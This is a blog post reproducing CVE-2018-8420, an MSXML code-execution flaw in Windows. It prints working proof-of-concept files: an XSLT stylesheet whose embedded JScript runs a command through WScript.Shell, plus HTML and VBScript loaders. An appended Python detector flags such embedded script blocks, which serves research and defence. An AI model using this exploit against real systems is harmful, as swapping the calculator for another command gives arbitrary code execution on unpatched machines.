
CVE-2018-8420 Vulnerability Reproduction

Date: 2018-12-22 01:12:22


Affected Windows versions:

Microsoft Windows 10 Version 1607 for 32-bit Systems
Microsoft Windows 10 Version 1607 for x64-based Systems
Microsoft Windows 10 Version 1803 for 32-bit Systems
Microsoft Windows 10 Version 1803 for x64-based Systems
Microsoft Windows 10 for 32-bit Systems
Microsoft Windows 10 for x64-based Systems
Microsoft Windows 10 version 1703 for 32-bit Systems
Microsoft Windows 10 version 1703 for x64-based Systems
Microsoft Windows 10 version 1709 for 32-bit Systems
Microsoft Windows 10 version 1709 for x64-based Systems
Microsoft Windows 7 for 32-bit Systems SP1
Microsoft Windows 7 for x64-based Systems SP1
Microsoft Windows 8.1 for 32-bit Systems
Microsoft Windows 8.1 for 64-bit Systems
Microsoft Windows RT 8.1
Microsoft Windows Server 1709
Microsoft Windows Server 1803
Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
Microsoft Windows Server 2008 R2 for x64-based Systems SP1
Microsoft Windows Server 2008 for 32-bit Systems SP2
Microsoft Windows Server 2008 for Itanium-based Systems SP2
Microsoft Windows Server 2008 for x64-based Systems SP2
Microsoft Windows Server 2012
Microsoft Windows Server 2012 R2
Microsoft Windows Server 2016

Reproducing the vulnerability:

Local test system: Microsoft Windows Server 2008 R2 Datacenter

PoC: https://github.com/Sch01ar/CVE-2018-8420

xml (launches the calculator)

<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
 <ms:script implements-prefix="user" language="JScript">
 <![CDATA[
 var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
 ]]> </ms:script>
</stylesheet>

html

<script type="text/vbscript">
Sub POC()
Set XML = CreateObject("Microsoft.XMLDOM")
XML.async = False
Set xsl = XML
xsl.Load "xml.xml"
XML.transformNode xsl
End Sub
POC()
</script>

vbs

Sub Dummy()
Set XML = CreateObject("Microsoft.XMLDOM")
XML.async = False
Set xsl = XML
xsl.Load "xml.xml"
XML.transformNode xsl
End Sub
Dummy()

Open xml.html


Click Yes

Click Yes

The calculator launches successfully

Run xml.vbs directly

The calculator launches successfully here as well
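For triage on the defensive side, the following added example (not part of the original post or the PoC repository) flags XSLT stylesheets that carry an embedded script block like the one in xml.xml. It matches on the namespace URI rather than the prefix, because the PoC binds the extension namespace to `ms:` and a text search for `msxsl:script` would miss it. The function name, the keyword list and the sample stylesheets are assumptions constructed for this example.

```python
import re
import xml.etree.ElementTree as ET

# Namespace that marks MSXML script extension elements (taken from the PoC stylesheet)
MSXSL_NS = "urn:schemas-microsoft-com:xslt"
# Heuristic keyword list (an assumption): script that reaches for COM automation
COM_HINTS = re.compile(r"ActiveXObject|CreateObject|GetObject|WScript\.Shell", re.I)

def audit_stylesheet(xml_text):
    """Return one finding per embedded script block in an XSLT document."""
    xml_text = xml_text.strip()
    # Refuse DTDs instead of expanding entities; send the file to manual review
    if re.search(r"<!DOCTYPE|<!ENTITY", xml_text, re.I):
        return [{"issue": "dtd-present"}]
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        return [{"issue": "unparseable", "detail": str(exc)}]
    findings = []
    # Match by namespace URI so any prefix (ms:, msxsl:, ...) is caught
    for el in root.iter(f"{{{MSXSL_NS}}}script"):
        body = "".join(el.itertext())
        findings.append({
            "issue": "embedded-script",
            "language": el.get("language"),
            "implements_prefix": el.get("implements-prefix"),
            "com_automation": bool(COM_HINTS.search(body)),
        })
    return findings

# Constructed sample: same layout as the PoC stylesheet, with a placeholder ProgID
SAMPLE_SCRIPTED = """<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform"
  xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
  <output method="text"/>
  <ms:script implements-prefix="user" language="JScript"><![CDATA[
    var o = new ActiveXObject("Constructed.Placeholder");
  ]]></ms:script>
</stylesheet>"""

# Constructed sample: an ordinary stylesheet with no script extension
SAMPLE_CLEAN = """<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
  <xsl:template match="/"><xsl:value-of select="name(*)"/></xsl:template>
</xsl:stylesheet>"""

if __name__ == "__main__":
    for name, doc in (("scripted", SAMPLE_SCRIPTED), ("clean", SAMPLE_CLEAN)):
        print(name, audit_stylesheet(doc))
```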


Original article: https://www.cnblogs.com/sch01ar/p/10159380.html
